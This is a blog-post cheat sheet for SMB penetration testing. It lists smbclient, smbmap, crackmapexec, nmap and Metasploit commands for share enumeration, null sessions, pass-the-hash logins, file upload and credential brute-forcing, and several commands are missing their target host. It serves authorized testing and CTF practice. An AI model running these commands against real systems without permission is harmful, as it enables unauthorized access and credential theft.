SMB Pentest Checklist


SMB Enumeration 

smbmap -H          //Check Privileges 

smbmap -H -R --depth 5

smbclient -L //            //List Shares

smbclient //      //Interactive shell to a share 

smbclient  \\\\\\share$     //Open a Null Session

smbclient //friendzone.htb/general -U ""    //see files inside

smbclient -N -L //      //List Shares as Null User administrator@         //Enter pass later

smbmap -u Administrator -p 'Password@1' -H

smbclient -U 'administrator%Password@1' \\\\\\\c$

once logged in;

put filename               //can upload any file

#access SMB shares via Windows CMD
net view \\ /All

#Using Kerberos ticket with Smbclient
smbclient -k -L //
#Basic SMB & OS info crackmapexec smb #List Shares crackmapexec smb --shares

#If the password needs to be changed
smbpasswd -U username -r

#access SMB using a hash

smbclient // -U username --pw-nt-hash 07772ae654432cd618915793515asds
#Starting SMB Server
sudo share $(pwd)
#Brute forcing SMB Creds
crackmapexec smb -u users.txt -p passwords.txt #passing blank creds via smb crackmapexec smb --shares -u '' -p '' #Bruteforcing SMB using hashes proxychains crackmapexec -t 15 smb -u users -H hashes --no-bruteforce --continue-on-success
SMB Enum using Nmap 

#SMB Users Enum
nmap -Pn -sV --script smb-enum-users.nse -p445 IP_Address

#SMB OS Discovery
nmap -Pn -sV --script smb-os-discovery IP_Address

#SMB Protocol Discovery
nmap -Pn -sV --script smb-protocols IP_Address 

#SMB Shares Enum
nmap -Pn -sV --script smb-enum-shares -p139,445 IP_Address
nmap -Pn -sV --script smb-enum-shares IP_Address

#SMB Vuln Scan
nmap -Pn -sV --script smb-vuln* IP_Address
#SMB Shares Enum using RPCClient
rpcclient -U "" -N IP_Address
#Enum Using Metasploit 
use auxiliary/scanner/smb/smb_enumshares
set rhosts IP_Address

Also refer to Windows Privilege Escalation Cheatsheet & Linux Privilege Escalation Cheatsheet

Bhanu Namikaze

Bhanu Namikaze is an Ethical Hacker, Security Analyst, Blogger, Web Developer and a Mechanical Engineer. He Enjoys writing articles, Blogging, Debugging Errors and Capture the Flags. Enjoy Learning; There is Nothing Like Absolute Defeat - Try and try until you Succeed.

No comments:

Post a Comment